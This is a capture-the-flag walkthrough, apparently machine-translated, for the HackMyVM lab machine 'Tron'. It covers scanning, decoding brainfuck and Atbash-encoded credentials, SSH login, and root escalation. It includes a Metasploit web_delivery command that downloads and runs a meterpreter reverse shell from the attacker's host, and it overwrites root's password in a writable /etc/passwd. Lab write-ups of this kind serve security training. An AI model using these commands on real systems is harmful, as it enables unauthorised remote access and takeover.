Hackmyvm target series (7) -tron

One 、 information gathering

Pictured , Old method , Let's start with a wave of network segment scanning , Detect live hosts

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

And then use nmap Scan port , Explore open services , It is found that the target host is open ssh Service and http service

nmap -sC -sV -p- 192.168.200.168

Access the target's http service , See the following results .

Then right click to see the source code , Find the following string , It looks like an account and password .

  Try to login to the target host with the following password , But it failed .

kzhh:SbWP9q94ZtE9qD

Then let's have a wave of directory scanning ! See if there will be any new discoveries

gobuster dir -u http://192.168.200.168/ -w /tools/dict/directory-list-2.3-medium.txt -x php,html,txt,zip,7z,gz,bak -t 30

There are still a lot of files and directories . Visit one by one .

After an interview , Only in /MCP Valid information was found in the directory

Pictured , There is one tron.txt file .

Visit this file to see .

There is a dialogue in the file , There is also a long string at the bottom .

Translate the dialogue

The bottom string looks like base64 code , Take it and decode it to the following results , It also looks like a kind of coding , But I have never seen this code .

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----.-----------.++++++++++++++++++++++++.--------------------.+++++++++++++.

So Baidu Yibo , Find out this is barinfuck code

Brainfuck Interpreter

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

The result of decoding is player, Combine the above conversation , This is probably a user name .

Then continue to visit /MCP/ A file in a directory , I found a file with the following contents .

plaintext --- Plaintext

ciphertext--- Ciphertext

I guess the password here is probably replaced by encryption . This encrypted password is likely to be a comment previously seen in the web page source code .

kzhh:SbWP9q94ZtE9qD

Two 、 Exploit

Pictured , To decrypt the ciphertext .

  Get the password

pass:SyWP9j94ZgE9jD

The script is as follows ：

#!/usr/bin/python
# -*- coding: utf-8 -*-


str1 = "abcdefghijklmnopqrstuvwxyz"
str2 = "zyxwvutsrqponmlkjihgfedcba"
ciphertext = "kzhh:SbWP9q94ZtE9qD"
plaintext = ""
for i,c in enumerate(ciphertext):
    if c in str2:
        index = str2.find(c)
        plaintext += str1[index]
    else:
        plaintext += c
print(plaintext)

Log in to the target host with the obtained user name and password .

ssh [email protected]

Get the first one flag

3、 ... and 、 Elevated privileges

Enter the following command

sudo -l

Since I can't , Then try it. suid and sgid Raise your rights

Enter the following command

find / -prem -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

The result is shown in the figure , There is no document that can raise the right again .

Since none of this works , Then upload a script , Collect more detailed information .

Here we can go through nc、curl、wget coordination http The service downloads files directly on the target machine , But I've seen it here recently msf This module on , It's very interesting , You can go online directly with one command msf, I'm going to use a wave msf La .

use exploit/multi/script/web_delivery     # This module can be launched by directly executing commands msf
show target                               # Look at the goal 
set target 7
set payload payload/linux/x86/meterpreter/reverse_tcp  # Set up payload
set srvport 6666
set lhost 192.168.200.218
run

Then run the module , You will get the following command

wget -qO 3gsWPNx9 --no-check-certificate http://192.168.200.218:6666/3vM41a0iXQ; chmod +x 3gsWPNx9; ./3gsWPNx9& disown

Execute the command on the target host

Pictured , Successful launch MSF

Upload the information collection script to the target machine

upload /home/kali/LinEnum.sh

There is a lot of information collected by using scripts , I won't take screenshots one by one .

Pictured , Here we find /etc/passwd The file is readable and writable by any user .

So, can we modify /etc/passwd Documents to achieve the effect of raising rights ？

linux There are two files related to passwords in ,/etc/passwd,/etc/shadow

The former stores some user information , The latter stores the encrypted password . But there is a feature in it , If /etc/passwd The password is stored in , So even if this password is related to shadow Different from , But will give priority to /etc/passwd The password .

Pictured , Enter the following command to generate the encrypted password

openssl passwd

Use msf change /etc/passwd file , take root Change the password as follows .

edit /etc/passwd

there root There is no open remote connection , Directly in kali The connection will fail .

We switch locally to root user .

Pictured , Successfully promoted the permission to root, Get the second flag